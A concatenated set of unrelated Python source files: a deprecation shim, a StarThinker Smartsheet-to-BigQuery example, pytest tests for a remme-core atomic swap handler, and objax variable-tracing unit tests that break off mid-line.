from amaranth.hdl.mem import * from amaranth.hdl.mem import __all__ import warnings warnings.warn("instead of nmigen.hdl.mem, use amaranth.hdl.mem", DeprecationWarning, stacklevel=2)
examples/smartsheet_report_to_bigquery_example.py
Ressmann/starthinker
138
12749270
<reponame>Ressmann/starthinker<filename>examples/smartsheet_report_to_bigquery_example.py ########################################################################### # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ########################################################################### # # This code generated (see scripts folder for possible source): # - Command: "python starthinker_ui/manage.py example" # ########################################################################### import argparse import textwrap from starthinker.util.configuration import Configuration from starthinker.task.smartsheet.run import smartsheet def recipe_smartsheet_report_to_bigquery(config, auth_read, auth_write, token, report, dataset, table, schema): """Move report data into a BigQuery table. Args: auth_read (authentication) - Credentials used for reading data. auth_write (authentication) - Credentials used for writing data. token (string) - Retrieve from SmartSheet account settings. report (string) - Retrieve from report properties. dataset (string) - Existing BigQuery dataset. table (string) - Table to create from this report. schema (json) - Schema provided in JSON list format or leave empty to auto detect. """ smartsheet(config, { 'auth':auth_read, 'token':token, 'report':report, 'out':{ 'bigquery':{ 'auth':auth_write, 'dataset':dataset, 'table':table, 'schema':schema } } }) if __name__ == "__main__": parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(""" Move report data into a BigQuery table. 1. Specify <a href='https://smartsheet-platform.github.io/api-docs/' target='_blank'>SmartSheet Report</a> token. 2. Locate the ID of a report by viewing its properties. 3. Provide a BigQuery dataset ( must exist ) and table to write the data into. 4. StarThinker will automatically map the correct schema. """)) parser.add_argument("-project", help="Cloud ID of Google Cloud Project.", default=None) parser.add_argument("-key", help="API Key of Google Cloud Project.", default=None) parser.add_argument("-client", help="Path to CLIENT credentials json file.", default=None) parser.add_argument("-user", help="Path to USER credentials json file.", default=None) parser.add_argument("-service", help="Path to SERVICE credentials json file.", default=None) parser.add_argument("-verbose", help="Print all the steps as they happen.", action="store_true") parser.add_argument("-auth_read", help="Credentials used for reading data.", default='user') parser.add_argument("-auth_write", help="Credentials used for writing data.", default='service') parser.add_argument("-token", help="Retrieve from SmartSheet account settings.", default='') parser.add_argument("-report", help="Retrieve from report properties.", default=None) parser.add_argument("-dataset", help="Existing BigQuery dataset.", default='') parser.add_argument("-table", help="Table to create from this report.", default='') parser.add_argument("-schema", help="Schema provided in JSON list format or leave empty to auto detect.", default=None) args = parser.parse_args() config = Configuration( project=args.project, user=args.user, service=args.service, client=args.client, key=args.key, verbose=args.verbose ) recipe_smartsheet_report_to_bigquery(config, args.auth_read, args.auth_write, args.token, args.report, args.dataset, args.table, args.schema)
testing/unit/tp/atomic_swap/test_init.py
FerrySchuller/remme-core
129
12749301
""" Provide tests for atomic swap handler initialization method implementation. """ import datetime import time import pytest from sawtooth_sdk.processor.exceptions import InvalidTransaction from sawtooth_sdk.protobuf.processor_pb2 import TpProcessRequest from sawtooth_sdk.protobuf.setting_pb2 import Setting from sawtooth_sdk.protobuf.transaction_pb2 import ( Transaction, TransactionHeader, ) from testing.conftest import create_signer from testing.mocks.stub import StubContext from testing.utils.client import proto_error_msg from remme.clients.block_info import ( CONFIG_ADDRESS, BlockInfoClient, ) from remme.protos.account_pb2 import Account from remme.protos.atomic_swap_pb2 import ( AtomicSwapInfo, AtomicSwapInitPayload, AtomicSwapMethod, ) from remme.protos.block_info_pb2 import BlockInfo, BlockInfoConfig from remme.protos.transaction_pb2 import TransactionPayload from remme.shared.utils import hash512 from remme.settings import ( SETTINGS_KEY_ZERO_ADDRESS_OWNERS, SETTINGS_SWAP_COMMISSION, ZERO_ADDRESS, ) from remme.settings.helper import _make_settings_key from remme.tp.atomic_swap import AtomicSwapHandler from remme.tp.basic import BasicHandler TOKENS_AMOUNT_TO_SWAP = 200 SWAP_COMMISSION_AMOUNT = 100 BOT_ETHEREUM_ADDRESS = '0xe6ca0e7c974f06471759e9a05d18b538c5ced11e' BOT_PRIVATE_KEY = '<KEY>' BOT_PUBLIC_KEY = '03ecc5cb4094eb05319be6c7a63ebf17133d4ffaea48cdcfd1d5fc79dac7db7b6b' BOT_ADDRESS = '112007b9433e1da5c624ff926477141abedfd57585a36590b0a8edc4104ef28093ee30' ALICE_ETHEREUM_ADDRESS = '0x8dfe0f55a1cf9b22b8c85a9ff7a85a28a3879f71' ALICE_ADDRESS = '112007db8a00c010402e2e3a7d03491323e761e0ea612481c518605648ceeb5ed454f7' ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR = '0x6f4d5666332f5a575a714d4245624455612f2b4345424f704b4256704f5' BOT_IT_IS_INITIATOR_MARK = '' SWAP_ID = '033102e41346242476b15a3a7966eb5249271025fc7fb0b37ed3fdb4bcce3884' ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY = _make_settings_key(SETTINGS_SWAP_COMMISSION) ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY = _make_settings_key(SETTINGS_KEY_ZERO_ADDRESS_OWNERS) ADDRESS_TO_STORE_SWAP_INFO_BY = BasicHandler( name=AtomicSwapHandler().family_name, versions=AtomicSwapHandler()._family_versions[0] ).make_address_from_data(data=SWAP_ID) TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS = { 'family_name': AtomicSwapHandler().family_name, 'family_version': AtomicSwapHandler()._family_versions[0], } RANDOM_NODE_PUBLIC_KEY = '<KEY>' RANDOM_PUBLIC_KEY = '<KEY>' CURRENT_TIMESTAMP = int(datetime.datetime.now().timestamp()) BLOCK_INFO_CONFIG_ADDRESS = CONFIG_ADDRESS BLOCK_INFO_ADDRESS = BlockInfoClient.create_block_address(1000) block_info_config = BlockInfoConfig() block_info_config.latest_block = 1000 SERIALIZED_BLOCK_INFO_CONFIG = block_info_config.SerializeToString() block_info = BlockInfo() block_info.timestamp = CURRENT_TIMESTAMP SERIALIZED_BLOCK_INFO = block_info.SerializeToString() INPUTS = [ ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY, BLOCK_INFO_CONFIG_ADDRESS, BLOCK_INFO_ADDRESS, BOT_ADDRESS, ZERO_ADDRESS, ADDRESS_TO_STORE_SWAP_INFO_BY, ] OUTPUTS = [ ADDRESS_TO_STORE_SWAP_INFO_BY, ZERO_ADDRESS, BOT_ADDRESS, ] def test_atomic_swap_init_with_empty_proto(): """ Case: send empty proto for init Expect: invalid transaction error """ inputs = outputs = [ ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY, BLOCK_INFO_CONFIG_ADDRESS, BLOCK_INFO_ADDRESS, BOT_ADDRESS, ZERO_ADDRESS, ADDRESS_TO_STORE_SWAP_INFO_BY, ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY, ] atomic_swap_init_payload = AtomicSwapInitPayload() transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=inputs, outputs=outputs, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) mock_context = StubContext(inputs=inputs, outputs=outputs, initial_state={}) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) assert proto_error_msg( AtomicSwapInitPayload, { 'receiver_address': ['Missed address'], 'sender_address_non_local': ['This field is required.'], 'amount': ['This field is required.'], 'swap_id': ['Missed swap_id'], 'created_at': ['This field is required.'], } ) == str(error.value) def test_atomic_swap_init(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens. Expect: bot sends commission to the zero account address, swap amount is decreased from bot account. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) bot_account = Account() bot_account.balance = 5000 serialized_bot_account = bot_account.SerializeToString() zero_account = Account() zero_account.balance = 0 serialized_zero_account = zero_account.SerializeToString() swap_commission_setting = Setting() swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT)) serialized_swap_commission_setting = swap_commission_setting.SerializeToString() genesis_members_setting = Setting() genesis_members_setting.entries.add(key=SETTINGS_KEY_ZERO_ADDRESS_OWNERS, value=f'{BOT_PUBLIC_KEY},') serialized_genesis_members_setting = genesis_members_setting.SerializeToString() mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG, BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO, BOT_ADDRESS: serialized_bot_account, ZERO_ADDRESS: serialized_zero_account, ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting, ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY: serialized_genesis_members_setting, }) swap_info = AtomicSwapInfo() swap_info.swap_id = SWAP_ID swap_info.state = AtomicSwapInfo.OPENED swap_info.amount = TOKENS_AMOUNT_TO_SWAP swap_info.created_at = CURRENT_TIMESTAMP swap_info.email_address_encrypted_optional = ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR swap_info.sender_address = BOT_ADDRESS swap_info.sender_address_non_local = BOT_ETHEREUM_ADDRESS swap_info.receiver_address = ALICE_ADDRESS swap_info.is_initiator = True serialized_swap_info = swap_info.SerializeToString() expected_bot_account = Account() expected_bot_account.balance = 5000 - TOKENS_AMOUNT_TO_SWAP - SWAP_COMMISSION_AMOUNT serialized_expected_bot_account = expected_bot_account.SerializeToString() expected_zero_account = Account() expected_zero_account.balance = SWAP_COMMISSION_AMOUNT serialized_expected_zero_account = expected_zero_account.SerializeToString() expected_state = { BOT_ADDRESS: serialized_expected_bot_account, ZERO_ADDRESS: serialized_expected_zero_account, ADDRESS_TO_STORE_SWAP_INFO_BY: serialized_swap_info, } AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) state_as_list = mock_context.get_state(addresses=[ ADDRESS_TO_STORE_SWAP_INFO_BY, BOT_ADDRESS, ZERO_ADDRESS, ]) state_as_dict = {entry.address: entry.data for entry in state_as_list} assert expected_state == state_as_dict def test_atomic_swap_init_already_taken_id(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with already existing swap id. Expect: invalid transaction error is raised with atomic swap id has already been taken error message. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) swap_info = AtomicSwapInfo() swap_info.swap_id = SWAP_ID swap_info.state = AtomicSwapInfo.OPENED swap_info.amount = TOKENS_AMOUNT_TO_SWAP swap_info.created_at = CURRENT_TIMESTAMP swap_info.email_address_encrypted_optional = ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR swap_info.sender_address = BOT_ADDRESS swap_info.sender_address_non_local = BOT_ETHEREUM_ADDRESS swap_info.receiver_address = ALICE_ADDRESS serialized_swap_info = swap_info.SerializeToString() mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ ADDRESS_TO_STORE_SWAP_INFO_BY: serialized_swap_info, }) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) assert 'Atomic swap ID has already been taken, please use a different one.' == str(error.value) def test_atomic_swap_init_swap_no_block_config_info(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens when no block config settings. Expect: invalid transaction error is raised with nlock config not found error message. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={}) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) assert 'Block config not found.' == str(error.value) def test_atomic_swap_init_swap_no_block_info(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens when no needed block information. Expect: invalid transaction error is raised with nlock config not found error message. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG, }) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) assert f'Block {block_info_config.latest_block + 1} not found.' == str(error.value) def test_atomic_swap_init_swap_receiver_address_invalid_type(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with invalid Alice node address. Expect: invalid transaction error is raised with atomic swap id has already been taken error message. """ invalid_receiver_address = '112934y*(J#QJ3UH*PD(:9B&TYDB*I0b0a8edc4104ef28093ee30' atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=invalid_receiver_address, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG, BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO, }) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) assert proto_error_msg( AtomicSwapInitPayload, {'receiver_address': ['Address is not of a blockchain token type.']} ) == str(error.value) def test_atomic_swap_init_swap_wrong_commission_address(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with wrong commission settings. Expect: invalid transaction error is raised with wrong commission address error message. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) swap_commission_setting = Setting() swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value='-1') serialized_swap_commission_setting = swap_commission_setting.SerializeToString() mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG, BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO, ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting, }) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) assert 'Wrong commission address.' == str(error.value) def test_atomic_swap_init_swap_no_account_in_state(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens from non-existent bot address. Expect: invalid transaction error is raised with not enough balance error message. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) swap_commission_setting = Setting() swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT)) serialized_swap_commission_setting = swap_commission_setting.SerializeToString() mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG, BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO, ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting, }) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) total_amount = TOKENS_AMOUNT_TO_SWAP + SWAP_COMMISSION_AMOUNT assert f'Not enough balance to perform the transaction in the amount (with a commission) {total_amount}.' \ == str(error.value) def test_atomic_swap_init_swap_not_enough_balance(): """ Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with not enough bot address balance. Expect: invalid transaction error is raised with not enough balance error message. """ atomic_swap_init_payload = AtomicSwapInitPayload( receiver_address=ALICE_ADDRESS, sender_address_non_local=BOT_ETHEREUM_ADDRESS, amount=TOKENS_AMOUNT_TO_SWAP, swap_id=SWAP_ID, secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK, email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR, created_at=CURRENT_TIMESTAMP, ) transaction_payload = TransactionPayload() transaction_payload.method = AtomicSwapMethod.INIT transaction_payload.data = atomic_swap_init_payload.SerializeToString() serialized_transaction_payload = transaction_payload.SerializeToString() transaction_header = TransactionHeader( signer_public_key=BOT_PUBLIC_KEY, family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'), family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'), inputs=INPUTS, outputs=OUTPUTS, dependencies=[], payload_sha512=hash512(data=serialized_transaction_payload), batcher_public_key=RANDOM_NODE_PUBLIC_KEY, nonce=time.time().hex().encode(), ) serialized_header = transaction_header.SerializeToString() transaction_request = TpProcessRequest( header=transaction_header, payload=serialized_transaction_payload, signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header), ) bot_account = Account() bot_account.balance = 0 serialized_bot_account_balance = bot_account.SerializeToString() swap_commission_setting = Setting() swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT)) serialized_swap_commission_setting = swap_commission_setting.SerializeToString() mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={ BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG, BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO, BOT_ADDRESS: serialized_bot_account_balance, ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting, }) with pytest.raises(InvalidTransaction) as error: AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context) total_amount = TOKENS_AMOUNT_TO_SWAP + SWAP_COMMISSION_AMOUNT assert f'Not enough balance to perform the transaction in the amount (with a commission) {total_amount}.' \ == str(error.value)
tests/tracing.py
kihyuks/objax
715
12749308
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unitests for automatic variable tracing.""" import unittest import numpy as np import jax.numpy as jn import objax from objax.zoo.dnnet import DNNet global_w = objax.TrainVar(jn.zeros(5)) global_b = objax.TrainVar(jn.zeros(1)) global_m = objax.nn.Sequential([objax.nn.Conv2D(2, 4, 3), objax.nn.BatchNorm2D(4)]) class TestTracing(unittest.TestCase): """Unit tests for variable tracing using.""" def test_function_global_vars(self): def loss(x, y): pred = jn.dot(x, global_w.value) + global_b.value return 0.5 * ((y - pred) ** 2).mean() vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, {'global_w': global_w, 'global_b': global_b}) def test_function_global_module(self): def loss(x): return jn.sum(global_m(x, training=True)) vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, global_m.vars(scope='global_m.')) def test_function_closure_vars(self): w = objax.TrainVar(jn.zeros(5)) b = objax.TrainVar(jn.zeros(1)) def loss(x, y): pred = jn.dot(x, w.value) + b.value return 0.5 * ((y - pred) ** 2).mean() vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, {'w': w, 'b': b}) def test_function_closure_module(self): m = objax.nn.Sequential([objax.nn.Conv2D(1, 2, 3), objax.nn.BatchNorm2D(2)]) def loss(x): return jn.sum(m(x, training=True)) vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, m.vars(scope='m.')) def test_lambda_with_closure_vars(self): w = objax.TrainVar(jn.zeros(5)) b = objax.TrainVar(jn.zeros(1)) loss = lambda x, y: 0.5 * ((y - jn.dot(x, w.value) + b.value) ** 2).mean() vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, {'w': w, 'b': b}) def test_multiline_lambda_with_closure_vars(self): w = objax.TrainVar(jn.zeros(5)) b = objax.TrainVar(jn.zeros(1)) loss = lambda x, y: ( 0.5 * ((y - jn.dot(x, w.value) + b.value) ** 2).mean() ) vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, {'w': w, 'b': b}) def test_closure_overrides_global_vars(self): # Make sure that global variables are what we expect them to be np.testing.assert_allclose(global_w.value, np.zeros(5)) np.testing.assert_allclose(global_b.value, np.zeros(1)) def _do_test(): # define local variable with the same name as existing global global_w = objax.TrainVar(jn.ones(10)) # verify that global_w and global_b are what we expect them to be np.testing.assert_allclose(global_w.value, np.ones(10)) np.testing.assert_allclose(global_b.value, np.zeros(1)) # loss function which mixes closure vars, global vars and closure var hides global var def loss(x, y): pred = jn.dot(x, global_w.value) + global_b.value return 0.5 * ((y - pred) ** 2).mean() vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, {'global_w': global_w, 'global_b': global_b}) _do_test() # Make sure that global variables didn't change, in other words # that _do_test operated on local variables np.testing.assert_allclose(global_w.value, np.zeros(5)) np.testing.assert_allclose(global_b.value, np.zeros(1)) def test_typical_training_loop(self): # Define model and optimizer model = DNNet((32, 10), objax.functional.leaky_relu) opt = 